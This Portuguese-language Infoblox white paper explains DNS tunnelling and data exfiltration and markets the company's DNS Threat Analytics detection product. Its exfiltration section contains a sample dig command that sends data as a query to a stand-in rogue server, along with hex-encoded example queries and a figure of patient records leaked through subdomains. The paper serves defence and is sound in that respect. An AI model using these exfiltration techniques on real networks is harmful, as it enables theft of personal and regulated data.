Exfiltração de dados por meio da infraestrutura do DNS do

INFORME TÉCNICO
Exfiltração de dados por meio da
infraestrutura do DNS do provedor
de serviços
Fechamento do acesso por back-door a dados confidenciais
dos assinantes
Apresentação
Embora o DNS não tenha mudado muito desde sua invenção por Paul Mockapetris
em 1983, os recursos e habilidades dos hackers de hoje avançaram consideravelmente.
O DNS é uma rede de sobreposição para roteamento e cache desenvolvida
globalmente que conecta redes públicas, corporativas e a Internet. A universalidade
de uso e a natureza de código aberto da tecnologia o tornam extremamente vulnerável
a ataques de hackers, como os de DDoS, o que gera perguntas importantes.
Sua segurança é suficiente? É vulnerável à violação de dados? A resposta é que o
DNS pode estar sujeito a todo tipo de uso abusivo, o que o torna a back-door perfeita
para hackers que pretendam roubar dados confidenciais.
Os provedores de serviços precisam proteger não só seus dados corporativos e
de identificação pessoal armazenados em seus bancos de dados, mas também os
próprios assinantes e clientes corporativos para que não sejam vítimas de hackers ao
fazerem o download não intencional de malware e outras ameaças. Os provedores de
serviços hoje entendem que a segurança é altamente valorizada por seus assinantes
e que não pode mais ser considerada um simples “item da lista de verificação”,
mas sim um diferencial em qualificação e vantagem competitiva. Bloqueando
proativamente o acesso a domínios mal-intencionados, identificando dispositivos
infectados e mitigando o tunelamento DNS ativo e atividades de exfiltração de dados,
os provedores de serviços aumentarão seu valor para os assinantes e garantirão sua
satisfação, além de reduzirem o risco de interrupção do serviço.
Este documento mostra as táticas usadas pelos hackers para explorar o DNS para
tunelamento DNS e exfiltração de dados. Apresenta também o novo recurso exclusivo
da Infoblox, o Infoblox DNS Threat Analytics, que usa aprendizado de máquina e
faz análise de streaming em tempo real em consultas DNS ativas para detectar e
bloquear automaticamente o tunelamento DNS e a exfiltração de dados.
Roubar dados – por que e de que tipo?
O DNS é cada vez mais usado como caminho para exfiltração de dados, seja por
dispositivos infectados por malware ou por funcionários mal-intencionados. Segundo
pesquisa recente sobre segurança em DNS, 46% dos participantes enfrentaram
exfiltração via DNS e 45% sofreram tunelamento DNS. Em uma pesquisa do
Heavy Reading somente sobre provedores de serviços, quase 30% deles sofreram
tunelamento DNS semanal ou diário, e até 35% indicaram que tais ataques causaram
interrupção dos serviços, com impacto grave ou mesmo catastrófico. O tunelamento
DNS inclui com frequência o tunelamento de tráfego de protocolo IP visando à
exfiltração de dados.
Claramente, o tunelamento DNS e a exfiltração de dados são ameaças importantes
às redes dos provedores de serviços e aos assinantes e clientes corporativos.
E que tipos de dados podem ser roubados de assinantes e clientes corporativos?
Eles variam e podem incluir:
•
•
•
•
1
1
Informações de identificação pessoal (PII), como números de RG e CPF
Dados regulamentados relacionados à conformidade com o Padrão de Segurança
de Dados do Setor de Cartões de Pagamento (PCI DDS) e com a Lei de
Portabilidade e Responsabilidade de Seguros de Saúde (HIPAA)
Propriedade intelectual que dá à organização uma vantagem competitiva
Outras informações confidenciais, como números de cartões de crédito,
dados financeiros, folha de pagamento e e-mails de empresas
RFC 882 Domain Names - Concepts and Facilities, P. Mockapetris, The Internet Society (novembro de 1987)
INFORME TÉCNICO
Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços (SP)
Funcionários mal-intencionados estabelecem o túnel DNS de dentro da rede ou
criptografam e incorporam partes dos dados em consultas DNS. Os dados podem
ser descriptografados na outra extremidade e recompostos para que se obtenha as
informações valiosas buscadas.
As motivações variam de hacktivismo e espionagem até fraudes financeiras em que
os dados podem vendidos facilmente e de forma lucrativa no mercado negro.
DNS como protocolo de transporte
Os provedores de serviços e as empresas utilizam ativamente muitos mecanismos
de defesa e tecnologias de segurança, como firewalls de próxima geração, sistemas
de detecção e prevenção de invasão (IDSs e IPSs) e gateways de segurança.
Sendo assim, como os hackers conseguem usar o DNS para transportar dados
atravessando várias camadas de mecanismos de defesa cuidadosamente projetados?
A natureza do protocolo DNS, inventado há mais de 30 anos, faz com que ele seja
considerado confiável, embora vulnerável a hackers e funcionários mal-intencionados.
Para compreender essa vulnerabilidade, é importante entender a natureza das
mensagens DNS.
Há dois tipos de mensagens DNS, consultas e respostas, e elas têm o mesmo formato.
Cada mensagem consiste em cabeçalho e quatro seções: pergunta, resposta,
autoridade e adicional. Os “sinalizadores” do campo de cabeçalho controlam o
conteúdo dessas quatro seções, mas a estrutura de todas as mensagens DNS é
a mesma.2
Vários objetos e parâmetros no DNS têm limites de tamanho. Esses limites são listados
abaixo. Alguns podem ser facilmente mudados, e outros são mais fundamentais.3
Identificadores
63 octetos ou menos
Nomes
255 octetos ou menos
TTL
Positivo de um número de 32 bits assinado
Mensagens UDP
512 octetos ou menos4
O que isso significa? Os hackers têm como base 512 octetos para “codificar”
dados em mensagens UDP para evitar detecção. Eles também podem incorporar
informações de sinalização ou codificação leve em alguns dos identificadores ou
namespaces e roubá-los.
Exfiltração
A exfiltração de dados via DNS pode ser feita da seguinte forma: uma string de valor
é inserida na seção de nomes (até 255 octetos) ou na seção de mensagens UDP
(até 512 octetos), formatada como consulta e enviada a um servidor DNS malicioso
que registra a consulta.
Os hackers configuram um servidor de nome com registro de consulta habilitado.
Esse servidor de nome será o “servidor de captura” dos dados confidenciais que
estão sendo roubados. Ele executa uma instalação básica de BIND, é acessível pela
Internet e pode ficar oculto até mesmo em um modem a cabo, desde que tenha
acesso à porta 53.
2
RFC 1034 Domain Names - Concepts and Facilities, P. Mockapetris, The Internet Society (novembro de 1987)
3
RFC 1034 Domain Names - Concepts and Facilities, P. Mockapetris, The Internet Society (novembro de 1987)
4
RFC 2671 Extension Mechanisms for DNS (EDNS0), que permite maiores tamanhos de pacotes.
2
Digamos que o endereço IP do servidor malicioso seja 192.168.1.25. Um cliente
infectado ou relacionado a um funcionário mal-intencionado que esteja tentando
roubar dados pode consultar esse servidor malicioso com esta string:
>dig @192.168.1.25 my.name.rogue-server.com
No syslog do servidor malicioso, é registrada a mensagem a seguir.
info client 192.168.1.202#55648 (my.name.rogue-server.com): query: my.name.
roque-server.com IN A + (192.168.1.25)
Como vemos, embora esse seja um exemplo simples, os dados — que são
“my.name” — podem ser facilmente retransmitidos. Os métodos comuns de
transmissão real de dados são um pouco mais elaborados. Os hackers usam
algoritmos de codificação de dados para movimentar os dados, obscurecendo e
às vezes compactando o conteúdo e, frequentemente, desmembrando-os de forma
aleatória. Por exemplo, as consultas podem ter este aspecto:
0a55504b01021503140008000800.rogue-server.com
104b68426c86ad7391000000de000000.rogue-server.com
1c000c0000000000000000.rogue-server.com
40a481764a31005f5f4d.rogue-server.com
41434f53582f426561.rogue-server.com
Nesse exemplo, temos binário convertido em HEX para transmissão e remontagem
na extremidade de destino. Os dados reais podem ser registros médicos, números
de RG ou CPF, datas de nascimento ou outro tipo de informação confidencial.
É claro que os criminosos cibernéticos podem usar outros métodos mais inteligentes,
como marcação de ID, numeração sequencial, etc. Isso é especialmente útil para
marcar transações (como compras com cartão de crédito), em que a sequência de
eventos pode informar quais bits são nomes, números ou códigos de segurança de
cartões (CVV). Isso acontece principalmente no caso do malware FrameWorkPOS.
Como milhares de consultas DNS em potencial saem de uma rede como parte
de uma tentativa de exfiltração, pode parecer simples identificar um método de
transporte desse tipo, mas os ladrões sabem muito bem como evitar a detecção.
Eles usam métodos como “slow drip” (gotejamento lento), que envia consultas
em velocidade baixa e controlada para que a taxa de transmissão não suba
rapidamente e dispare alertas. Outro método usado é falsificação de IP de origem,
em que o IP de origem é reescrito nas consultas para que pareça que elas vêm de
muitos clientes diferentes. Uma segurança de rede correta deveria detectar essa
prática na porta de switch, mas você ficaria surpreso com a frequência de sucesso
dessa técnica!
3
INFORME TÉCNICO
Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços (SP)
Servidor controlado
por invasores rogue-server.com (C&C)
NameMarySmith.rogue-server.com
MRN100045429886.rogue-server.com
DOB10191952.rogue-server.com
Comandos C&C
Dados
INTERNET
EMPRESA
Servidor DNS
NameMarySmith.rogue-server.com
MRN100045429886.rogue-server.com
DOB10191952.rogue-server.com
Endpoint
infectado
Nome Mary Smith
MRN 100045429886 DOB 10191952
Médica clínica geral
Sally Vanderbilt,
Acompanhamento de diabetes
e doenças cardíacas
Figura 1: Consultas de exfiltração de dados via DNS
Infiltração
Vimos como pode ocorrer o vazamento de dados, mas que tal usar o DNS para
mover dados para dentro de uma rede? Os hackers podem usar o DNS para mover
conteúdo ou entrar sorrateiramente usando código mal-intencionado. É mais fácil do
que você pensa.
Usando um método semelhante à exfiltração, o hacker pode preparar um código
binário para transporte codificando-o (talvez como HEX) e carregá-lo em registros
TXT em seu servidor malicioso.
Mas como o hacker consegue passar por firewalls, IDSs e filtros de conteúdo?
Ele pode retirá-lo da linha de comando ou escrever algum código de navegador para
armazená-lo em um blob e depois despejar em um arquivo. Também pode apenas
injetá-lo usando DNS dinâmico no servidor DNS, onde pode acessar o código
usando navegadores, aplicativos de telefone ou phishing. Com meios como “onclick”
ou “exploit”, o código é baixado do DNS e montado por um cliente.
Agora que os hackers podem enviar e receber dados via DNS, o conceito de DNS
como protocolo de transporte secreto fica claro.
4
Tunelamento DNS
Quanto às redes de provedores de serviços, o uso mais comum de tunelamento
DNS é ignorar os mecanismos de segurança e faturamento para acessar serviços
de primeira linha, como Wi-Fi. Mas qualquer tipo de dado pode sofrer tunelamento
(SSH ou HTTP) em modo DNS, criptografado e compactado, para tristeza de
administradores de rede e equipes de segurança. O tunelamento DNS existe há
muito tempo. Há vários aplicativos de tunelamento muito conhecidos, como o Iodine,
considerado “padrão ouro”, o OzymanDNS, SplitBrain, DNS2TCP, TCP-over-DNS
e outros. Há também concorrentes mais recentes que permitem tunelamento em
velocidade muito mais alta e oferecem muitos recursos. Até mesmo alguns serviços
comerciais começaram a oferecer serviço de Rede privada virtual (VPN) em DNS,
permitindo que os assinantes ignorem muitos controles de segurança de Wi-Fi.
Grande parte dessas ferramentas têm assinaturas específicas que podem ser
usadas para detecção e mitigação.
Proteção Infoblox contra exfiltração de dados via DNS
Infoblox DNS Threat Analytics
Algumas soluções de segurança afirmam oferecer proteção ao DNS, mas na verdade
essa proteção é limitada. O Infoblox DNS Threat Analytics é uma nova tecnologia que
detecta e bloqueia automaticamente tentativas de roubo de propriedade intelectual
via DNS sem a necessidade de agentes de endpoint ou infraestrutura de rede
adicional. Ele usa análise de streaming de consultas DNS ativas em tempo real
e aprendizado de máquina para detectar com precisão a presença de dados em
consultas DNS.
Disponível como módulo adicional com o Infoblox DNS Firewall, parte das soluções
DNS Seguro para provedores de serviços, o Infoblox DNS Threat Analytics protege
contra técnicas sofisticadas de exfiltração de dados e kits de ferramentas de
tunelamento prontos para uso. A Infoblox é o primeiro fornecedor a oferecer uma
solução de infraestrutura do DNS com análise integrada para detectar e bloquear
tunelamento DNS e exfiltração de dados.
Entropia
Tamanho
Modelo
analítico
Frequência
Léxica
N-gram
Figura 2: Modelo analítico
5
INFORME TÉCNICO
Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços (SP)
•
•
•
•
Bloqueio ativo de exfiltração de dados: O DNS Threat Analytics detecta
e bloqueia automaticamente as comunicações para destinos associados a
tentativas de exfiltração de dados. O mecanismo adiciona automaticamente
destinos associados à exfiltração de dados à lista negra do Infoblox DNS Firewall.
Além disso, são enviadas atualizações em todo o Grid a todos os membros
Infoblox com recursos de firewall DNS/RPZ para estender a aplicação a todas as
partes da rede de exfiltração, mesmo aquelas sem assinaturas padrão, com base
em comportamento de consultas e padrões.
Tecnologia exclusiva: O Infoblox DNS Threat Analytics é uma tecnologia
exclusiva que usa aprendizado de máquina para análise de streaming em tempo
real em consultas DNS ativas para detectar exfiltração de dados. O mecanismo
de análise examina host.subdomínio e registros TXT em consultas DNS e usa
entropia, análise léxica e série temporal para determinar a presença de dados em
consultas. Isso maximiza as chances de detecção de novos métodos de exfiltração,
mesmo aqueles sem assinaturas padrão, com base em comportamento de
consultas e padrões.
Sem infraestrutura ou agentes adicionais: Ao contrário de outras abordagens
que analisam dados de log em lotes e após o estrago já ter sido feito, o DNS
Threat Analytics é integrado diretamente à infraestrutura do DNS que está
no caminho de exfiltração e, por isso, faz a detecção em tempo real, sem
necessidade de infraestrutura de rede adicional.
Visibilidade: A Infoblox proporciona visibilidade sobre dispositivos infectados
ou possíveis funcionários desonestos fornecendo informações detalhadas como
tipo do dispositivo, endereço IP e MAC e, o mais importante, indica o usuário
associado ao dispositivo que está tentando exfiltrar dados. Isso reduz o tempo
de reparo e acelera o processo de mitigação.
Detecção de tunelamento DNS com base em assinatura: Infoblox Advanced DNS
Protection para provedores de serviços
Além da detecção de exfiltração de dados via DNS em consultas com base em
comportamento, o Infoblox Advanced DNS Protection para provedores de serviços
tem várias regras de proteção contra ameaças capazes de detectar kits de ferramentas
de tunelamento DNS comuns e pacotes de malware como o Iodine. Essa detecção
baseia-se nas conhecidas assinaturas de kits de ferramentas de tunelamento padrão
que podem estar sendo usadas por clientes infectados ou funcionários desonestos e
permite o bloqueio imediato e ilimitado de tentativas de tunelamento.
Soluções de prevenção contra perda de dados
Grande parte das soluções de prevenção contra perda de dados (DLP) protege
contra o vazamento de dados por e-mail, web, ftp e outros vetores monitorando
dados em repouso, em movimento e em uso. Entretanto, elas não alcançam a
exfiltração baseada em DNS. O Infoblox DNS Threat Analytics complementa as
soluções de DLP tradicionais, impedindo que o DNS seja usado como back-door
para o roubo de dados. O modo mais eficaz de atacar a exfiltração de dados com
base em DNS é ter recursos de detecção inteligentes integrados diretamente
à infraestrutura do DNS.
Automatização da resposta a ameaças por meio de integrações
Embora a detecção e o bloqueio de tentativas de exfiltração de dados seja fundamental,
também é importante garantir a rápida correção de dispositivos infectados. Isso
pode ser feito com a integração mais estreita entre as tecnologias de detecção
e as soluções de correção de endpoint. O Infoblox integra-se a soluções líderes
de correção de endpoint como Bit 9 + Carbon Black para fornecer indicadores de
invasão quando um endpoint está tentando exfiltrar dados. Usando essa inteligência,
o Carbon Black impede automaticamente a execução e a conexão dos processos
mal-intencionados, coloca efetivamente o endpoint infectado em quarentena e
impede a exfiltração de dados, mesmo que esse dispositivo esteja fora da empresa.
6
Além disso, o Infoblox troca informações valiosas sobre eventos de rede e de
segurança com o Cisco Identity Services Engine (ISE) para automatizar a resposta
e a velocidade da segurança. O Infoblox envia um “alerta precoce” de dispositivos
invadidos (tentando exfiltrar dados) ao Cisco ISE usando o Cisco pxGrid. Essas
informações podem, então, ser enviadas à arquitetura de segurança da organização
para os procedimentos de quarentena.
Por fim, o Infoblox integra-se automaticamente às tecnologias SIEM ou a soluções
de análise de comportamento de usuário criadas internamente usando APIs para
fornecer dados contextuais valiosos como tipo de SO, informações sobre usuários
e concessão de DHCP de dispositivos infectados, sem a necessidade de agentes
de endpoint.
Resumo
O roubo de dados é um dos riscos mais sérios enfrentados por assinantes e clientes
corporativos de um provedor de serviços. O DNS frequentemente é usado como
caminho de exfiltração de dados, pois não é verificado pelos controles de segurança
comuns. A tecnologia Infoblox DNS Threat Analytics pode proteger contra as mais
sofisticadas técnicas de exfiltração de dados. O DNS está perto dos endpoints,
é ubíquo e pode ser usado com eficácia para aprimorar a postura de segurança
da organização.
Sobre a Infoblox
A Infoblox fornece serviços de rede essenciais para proteger a infraestrutura do
DNS (Domain Name System), automatizar implantações na nuvem e aumentar
a confiabilidade de redes empresariais e de provedores de serviços no mundo
inteiro. Como líder do setor de DNS, DHCP e gerenciamento de endereço IP,
categoria conhecida como DDI, a Infoblox (www.infoblox.com.br) reduz os riscos
e a complexidade das redes.
7
INFORME TÉCNICO
Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços (SP)
MATRIZES DA EMPRESA:
+1.408.986.4000
+1.866.463.6256
(ligue gratuitamente dos EUA e Canadá)
[email protected]
www.infoblox.com.br/cloud
MATRIZ EMEA:
+32.3.259.04.30
[email protected]
MATRIZ APAC:
+852.3793.3428
[email protected]
© 2015 Infoblox Inc. Todos os direitos reservados. Infoblox-WP-0111-00 Exfiltração de dados por meio da infraestrutura do DNS do provedor de serviços - Dez 2015